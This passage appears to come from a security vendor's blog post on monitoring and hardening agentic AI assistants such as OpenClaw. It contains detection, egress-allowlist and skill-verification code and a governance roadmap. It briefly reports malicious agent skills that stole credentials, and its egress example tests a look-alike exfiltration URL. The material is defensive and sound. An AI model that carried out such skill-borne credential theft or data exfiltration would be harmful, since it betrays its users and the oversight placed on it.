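    return signals


# Hypothetical event record, for illustration only.
example = {
    "event.type": "Process Creation",
    "tgt.process.cmdline": "node /opt/openclaw/gateway.js",
    "dst.port.number": 18789,
}
print(matched_signals(example))
```

Returning the list of matched categories, rather than a single boolean, lets an analyst prioritize events that hit several signals at once.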

Beyond this targeted query, SentinelOne’s tiered SOC hunting framework provides behavioral detection that catches agentic assistants even when they are renamed, updated, or running through wrapper processes:

Storyline connects the entire chain of custody (i.e., what launched the agent, what it touched, and where it communicated), providing a defensible incident narrative for any agentic AI activity.

The Prompt Security capabilities described in Pillar 7 of this document apply directly to OpenClaw (aka Clawdbot and Moltbot), but agentic assistants create risks that go beyond what standard AI chatbot monitoring addresses:

ClawSec, an open-source security skill suite built by Prompt Security from SentinelOne, provides defense-in-depth specifically designed for OpenClaw agents:

| Control Plane | Coverage Scope | Key Capability |
| --- | --- | --- |
| EDR/XDR (Singularity Agent + Data Lake) | Endpoint-level process, file, network, and persistence detection | Behavioral detection via Storyline; purpose-built PowerQuery for Clawdbot/OpenClaw/Moltbot |
| AI Interaction Security (Prompt Security) | User-to-AI interaction layer | Real-time data leakage prevention, prompt injection blocking, shadow AI discovery |
| Agent Hardening (ClawSec) | Within the OpenClaw agent runtime | Skill integrity verification, posture hardening, zero-trust egress control |

This three-layer approach ensures that whether an agentic AI assistant is discovered through EDR telemetry, flagged by Prompt Security’s interaction monitoring, or hardened proactively by ClawSec, security teams have full visibility and control over the risk these tools introduce.
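To make the "zero-trust egress control" entry in the table more concrete, the sketch below shows a default-deny outbound check. It is only an illustration of the general idea and does not describe how ClawSec implements it; the allowlisted hostnames and the function name `egress_allowed` are hypothetical.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would load this from policy.
ALLOWED_HOSTS = frozenset({"api.example.com", "registry.example.com"})


def egress_allowed(url: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Default-deny: permit only HTTPS requests to explicitly listed hosts."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    # Exact hostname match, so look-alike domains that merely embed an
    # allowed name (e.g. as a prefix) are rejected.
    host = (parts.hostname or "").lower()
    return host in allowed_hosts


for candidate in (
    "https://api.example.com/v1/chat",
    "http://api.example.com/v1/chat",
    "https://api.example.com.evil.net/upload",
):
    print(candidate, egress_allowed(candidate))
```

Matching on the exact parsed hostname, rather than on a substring of the URL, is the important design choice here: substring checks are easy to bypass with crafted domains.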

The agentic AI coverage detailed above draws on all seven of SentinelOne’s core security pillars working together. The following table maps each pillar to the AI-specific threats it addresses and the business outcomes it protects, giving security leaders a rapid-reference guide for aligning platform capabilities to their organization’s AI risk priorities.

| Security Pillar | AI Risk Addressed | Business Outcome Protected |
| --- | --- | --- |
| Cloud Native Security (CNS) | Exposed training data, misconfigured infrastructure, exploitable cloud paths | Prevents data breaches; reduces regulatory exposure |
| Workload Protection | Runtime compromise, container escapes, fileless attacks on AI hosts | Ensures AI service continuity; prevents operational disruption |
| AI SIEM | Multi-stage attacks, low-and-slow exfiltration, anomalous LLM usage | Enables detection of sophisticated threats; supports forensics and compliance |
| Purple AI | Evolving LLM attack techniques, slow investigation response times | Reduces MTTR; accelerates threat hunting without specialist expertise |
| Automation & Response | Fast-moving exfiltration, API key compromise, unauthorized data egress | Minimizes breach blast radius; contains incidents autonomously |
| Secret Scanning & IaC | Hardcoded credentials, pipeline vulnerabilities, insecure infrastructure definitions | Prevents supply chain compromise; secures pre-production environments |
| AI Usage & Agent Security (Prompt Security) | Shadow AI, prompt injection, data leakage through AI interactions, jailbreaks | Protects IP and sensitive data; enables safe AI adoption at scale |

This week: You can’t govern what you can’t see. Run the OpenClaw detection query in your Data Lake to determine whether agentic AI assistants are already active in your environment, assuming they are until proven otherwise. Audit browser extensions across high-risk teams. Review your AI acceptable use policy to confirm it addresses autonomous agents, not just chatbots. The goal is a baseline inventory of what AI tools exist, where they’re running, and who’s using them.
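The baseline inventory described above can be assembled from the detection query's output with very little code. The sketch below is one possible approach under stated assumptions: the rows are dictionaries keyed by column names from the query's `columns` clause, and `event.time` is an ISO 8601 UTC string so that string comparison orders timestamps correctly. The sample rows and the function name `build_inventory` are hypothetical.

```python
from collections import defaultdict


def build_inventory(rows: list) -> dict:
    """Group detection hits by endpoint, tracking users and first/last seen."""
    inventory = defaultdict(
        lambda: {"users": set(), "first_seen": None, "last_seen": None}
    )
    for row in rows:
        entry = inventory[row["endpoint.name"]]
        entry["users"].add(row["src.process.user"])
        seen = row["event.time"]
        if entry["first_seen"] is None or seen < entry["first_seen"]:
            entry["first_seen"] = seen
        if entry["last_seen"] is None or seen > entry["last_seen"]:
            entry["last_seen"] = seen
    return dict(inventory)


# Hypothetical exported rows, for illustration only.
rows = [
    {"endpoint.name": "dev-laptop-01", "src.process.user": "alice",
     "event.time": "2026-02-10T09:00:00Z"},
    {"endpoint.name": "dev-laptop-01", "src.process.user": "bob",
     "event.time": "2026-02-09T09:00:00Z"},
    {"endpoint.name": "build-02", "src.process.user": "ci",
     "event.time": "2026-02-11T09:00:00Z"},
]

for endpoint, entry in sorted(build_inventory(rows).items()):
    print(endpoint, sorted(entry["users"]), entry["first_seen"], entry["last_seen"])
```

The result answers the three inventory questions directly: which endpoints run the tools, which accounts run them, and over what time window.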

Within 90 days: Move from inventory to continuous visibility. A Prompt Security proof of value can get you there quickly, delivering real-time discovery of all AI tool usage across your environment, including the shadow AI activity your current stack can’t see. Use that visibility to establish sanctioned alternatives that give employees a secure path to the productivity they’re already chasing with unsanctioned tools. Operationalize behavioral detection hunts as automated detection rules so your SOC can identify new agentic activity as it appears, not months later.

Within 6 months: Mature from visibility into governance. Complete a full AI tool inventory with data classification and risk scoring. Establish enforcement policies that contain or block unsanctioned agentic tools at the endpoint, interaction, and network layers. Build board-ready reporting metrics that track AI-related risk posture over time. The organizations that move fastest here won’t be starting from scratch; they’ll be the ones that invested in visibility early enough to know what they’re governing.

Securing LLMs and AI is not a future challenge; it’s a present imperative. SentinelOne’s Singularity Platform, now significantly enhanced by the capabilities of Prompt Security, provides end-to-end protection that spans cloud infrastructure, workload runtime, AI interaction governance, and automated response.

But the threat landscape is no longer just about chatbots and data leakage. The rapid adoption of agentic AI assistants like OpenClaw demonstrates that AI tools are evolving from passive information retrieval into autonomous agents that execute code, access secrets, and operate with real privileges on real systems. This shift demands a corresponding shift in security posture — from monitoring what employees type into a browser to governing what autonomous processes do on your endpoints.

SentinelOne’s three-layer coverage model addresses this directly. EDR/XDR telemetry provides behavioral detection at the endpoint. Prompt Security governs the interaction layer where sensitive data meets AI. And ClawSec hardens the agent runtime itself. Together, these layers give security teams the ability to discover, govern, and contain agentic AI tools without blocking the productivity gains they deliver.

The gap between organizations that believe they have AI governance and those that actually do is exactly where breaches happen. Organizations that close that gap won’t be those that adopted AI fastest or blocked it longest; they’ll be the ones that built the visibility, controls, and response capabilities to adopt it safely.

Security isn’t the department that says no to AI. It’s the function that makes AI possible at enterprise scale. To learn more about securing your OpenClaw agents, register for our upcoming webinar happening Tuesday, March 3, 2026.

Autonomous agents are moving fast, from experimental side projects to real operational components inside development workflows and cloud environments. Agent capabilities are accelerating, but agent security has lagged behind. Most agent frameworks still assume implicit trust: trust in downloaded skills, trust in prompts that evolve over time, and trust in agents not to quietly exfiltrate data or drift into unsafe behavior.

That assumption has already been proven wrong. Over the last week, researchers uncovered more than 200 malicious OpenClaw skills published within a few days, all masquerading as legitimate utilities while delivering credential-stealing malware. Distributed through GitHub and OpenClaw’s official registry, these skills harvested API keys, cloud secrets, wallet data, and SSH credentials, highlighting how easily agent supply chains can be weaponized at scale.

This activity did not emerge in isolation. OpenClaw’s rapid growth, decentralized skill ecosystem, and deep system-level access have created a large, largely unmanaged attack surface. Skills are often installed directly from public repositories, documentation is trusted at face value, and agents are granted persistent memory and tool access that rivals traditional applications without equivalent security controls.

Since the assumption of implicit trust no longer holds in today’s landscape, ClawSec was designed to close that gap. ClawSec is an open-source security skill suite created to harden OpenClaw agents against prompt injection, supply chain compromise, configuration drift, and unsafe runtime behavior. Purpose-built as a “skill-of-skills”, ClawSec wraps agents in a continuously verified security layer, validating what it runs, how it changes, and where the data is allowed to go. Now live on GitHub, ClawSec is a zero-cost, privacy-first solution protecting both humans and autonomous agents via a single install.
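The idea of validating what an agent runs can be illustrated with hash pinning: a skill file is accepted only if its SHA-256 digest matches a digest recorded when the skill was reviewed. The sketch below shows that general technique and is not taken from ClawSec's code; the pinned-digest mapping and the function names are hypothetical.

```python
import hashlib
import hmac
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large skills need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_skill(path: Path, pinned: dict) -> bool:
    """True only if the file's hash equals the digest pinned for its name."""
    expected = pinned.get(path.name)
    if expected is None:
        return False  # unknown skills are rejected by default
    # compare_digest avoids leaking match position through timing.
    return hmac.compare_digest(sha256_of(path), expected)
```

A caller would build `pinned` from a reviewed manifest (for example `{"skill.md": "<hex digest>"}`) and refuse to load any skill for which `verify_skill` returns `False`, so both tampered and unreviewed skills are blocked.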

Traditional application security models don’t map cleanly onto agentic systems. Agents are dynamic by nature: they pull skills from external sources, modify their own prompts, call tools autonomously, and adapt their behavior over time. That flexibility is powerful, but it also creates new attack surfaces. Some of the most common failure modes include: